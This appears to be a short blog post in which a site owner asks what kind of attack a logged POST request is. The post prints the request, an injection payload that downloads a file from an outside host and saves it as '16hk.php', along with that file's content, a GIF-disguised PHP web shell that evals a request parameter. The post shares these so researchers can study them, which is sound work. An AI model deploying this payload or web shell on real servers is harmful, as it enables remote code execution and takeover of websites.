vendredi 2 avril 2021

What type of malware is this

What type of malware is this, like a new method, I google not found any clue

I received POST request on my log:

Array (
    [s] => file_put_contents('16hk.php',file_get_contents('http://txt.xiazi.top/114.txt'))
    [_method] => __construct
    [method] => 
    [filter] => Array
        (
            [0] => assert
        )

)

and I dig to the website of exploiter, containing this code:

GIF89a
<?php function s(){
$a=$_REQUEST['admin'];
    return $a;}
$xx=s();
$ganrao='';
@eval(`/***xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx***/`.$ganrao.$xx);

I archived it for researchers:

https://web.archive.org/web/20210402091118/http://txt.xiazi.top/114.txt




Publié par à
Libellés :

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)